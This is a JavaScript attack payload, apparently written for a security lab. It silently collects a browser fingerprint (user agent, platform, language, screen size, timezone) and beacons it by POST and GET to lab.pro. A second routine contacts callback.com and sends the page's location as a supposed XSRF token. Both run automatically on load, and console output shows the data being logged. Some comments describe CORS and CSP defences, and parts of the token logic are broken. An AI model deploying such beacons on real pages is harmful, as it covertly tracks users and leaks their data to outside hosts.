update:
/**
 * Builds a small browser fingerprint for the page this script runs in.
 *
 * Every value is read from standard browser APIs (navigator, window.screen,
 * Intl) and none of them triggers a permission prompt, so the user sees no
 * indication that the data was collected.
 *
 * @returns {{userAgent: string, platform: string, language: string,
 *            screenResolution: string, timezone: string}}
 *          screenResolution is formatted as "<width>x<height>".
 */
function clientInformation() {
  const { userAgent, platform, language } = navigator;
  const { width, height } = window.screen;
  const { timeZone } = Intl.DateTimeFormat().resolvedOptions();

  return {
    userAgent,
    platform,
    language,
    screenResolution: `${width}x${height}`,
    timezone: timeZone,
  };
}
/**
 * Sends the clientInformation() snapshot to the lab endpoint as the JSON body
 * of an asynchronous POST, then logs the parsed reply (or the status text on
 * any non-200 result).
 *
 * Defender's view: if the embedding page is on a different origin than
 * lab.pro, the application/json Content-Type makes this a non-simple CORS
 * request, so the browser issues an OPTIONS preflight first. A
 * Content-Security-Policy whose connect-src does not list the destination
 * blocks the request before it leaves the browser.
 */
function sendClientInfoViaPost() {
  const request = new XMLHttpRequest();
  request.open("POST", "https://lab.pro/index.php", true);
  request.setRequestHeader("Content-Type", "application/json");

  request.onreadystatechange = function () {
    // readyState 4 (DONE): the exchange has finished, successfully or not.
    if (request.readyState !== 4) {
      return;
    }
    if (request.status !== 200) {
      console.error("Error (POST):", request.statusText);
      return;
    }
    // The endpoint is expected to answer with JSON; a non-JSON body throws here.
    const reply = JSON.parse(request.responseText);
    console.log("Server Response (POST):", reply);
  };

  // The fingerprint travels in the request body, not in the URL.
  const payload = JSON.stringify(clientInformation());
  request.send(payload);
}
/**
 * Sends the clientInformation() snapshot to the lab endpoint as query-string
 * parameters of an asynchronous GET, then logs the parsed reply (or the status
 * text on any non-200 result).
 *
 * Defender's view: the collected values are part of the request URL, where web
 * server and proxy access logs normally record them. No custom header is set,
 * so a cross-origin call goes out without a CORS preflight; CORS only governs
 * whether the script may read the reply. Blocking the request itself takes a
 * connect-src CSP or a network egress control.
 */
function sendClientInfoViaGet() {
  const snapshot = clientInformation();

  // Only the values are percent-encoded; the keys are the fixed property names.
  const pairs = [];
  for (const field of Object.keys(snapshot)) {
    pairs.push(field + '=' + encodeURIComponent(snapshot[field]));
  }
  const queryString = pairs.join('&');

  const request = new XMLHttpRequest();
  request.open("GET", "https://lab.pro/index.php?" + queryString, true);

  request.onreadystatechange = function () {
    // readyState 4 (DONE): the exchange has finished, successfully or not.
    if (request.readyState !== 4) {
      return;
    }
    if (request.status !== 200) {
      console.error("Error (GET):", request.statusText);
      return;
    }
    // The endpoint is expected to answer with JSON; a non-JSON body throws here.
    const reply = JSON.parse(request.responseText);
    console.log("Server Response (GET):", reply);
  };

  // GET carries no body; everything is in the URL built above.
  request.send();
}
// Both beacons fire as soon as the script is evaluated, so the same client
// data is transmitted twice: once in a POST body and once in a GET query string.
sendClientInfoViaPost();
sendClientInfoViaGet();
Console output when both requests succeed:
undefined
VM3643:22 Server Response (POST): {status: 'success', message: 'Data received and logged.'}
VM3643:45 Server Response (GET): {status: 'success', message: 'Data received and logged.'}
-----
---
/**
 * Posts a placeholder JSON body to the callback host and, when the reply is a
 * 200 whose parsed JSON has a truthy `_.$n` member, triggers a second request
 * through sendToLabMachine().
 *
 * What the code actually does, as opposed to what the names suggest:
 *  - The `id` query value is the string form of clientInformation()'s return
 *    value, produced by plain string concatenation.
 *  - `messageId` is read into xsrfToken, but that variable is not used again;
 *    the argument handed to sendToLabMachine() is document.location.
 *
 * NOTE(review): the `_.$n.messageId` reply shape belongs to some application
 * this file does not identify; confirm against the lab target.
 */
function getXSRFToken() {
  const request = new XMLHttpRequest();
  const target = "https://callback.com/?id=" + clientInformation();
  request.open("POST", target, true);
  request.setRequestHeader("Content-Type", "application/json");

  request.onreadystatechange = function () {
    // Act only on a completed (readyState 4) request that returned 200.
    if (request.readyState !== 4 || request.status !== 200) {
      return;
    }
    const reply = JSON.parse(request.responseText);
    // `reply._` is dereferenced unguarded: a reply without `_` throws here.
    if (!reply || !reply._.$n) {
      return;
    }
    const xsrfToken = reply._.$n.messageId;
    sendToLabMachine(document.location);
  };

  const placeholderBody = {
    your: "data",
    here: "value"
  };
  request.send(JSON.stringify(placeholderBody));
}
/**
 * Posts `token` to the callback host as JSON of the form {"xsrfToken": <token>}
 * and logs a confirmation line once the host answers 200.
 *
 * The `id` query parameter is sent empty. Any other status, or a network
 * failure, is silently ignored because only the 200 case is handled.
 *
 * Defender's view: like the other JSON POSTs in this file, a cross-origin call
 * is preceded by a CORS preflight, and a connect-src CSP that omits the
 * destination blocks it.
 *
 * @param {*} token - Value to transmit; it is serialised with JSON.stringify.
 */
function sendToLabMachine(token) {
  const request = new XMLHttpRequest();
  request.open("POST", "https://callback.com/?id=", true);
  request.setRequestHeader("Content-Type", "application/json");

  request.onreadystatechange = function () {
    // Only a completed (readyState 4) request with status 200 is reported.
    const delivered = request.readyState === 4 && request.status === 200;
    if (delivered) {
      console.log("Token sent to lab machine successfully.");
    }
  };

  const body = JSON.stringify({ xsrfToken: token });
  request.send(body);
}
// Starts the two-step callback sequence immediately when the script is evaluated.
getXSRFToken();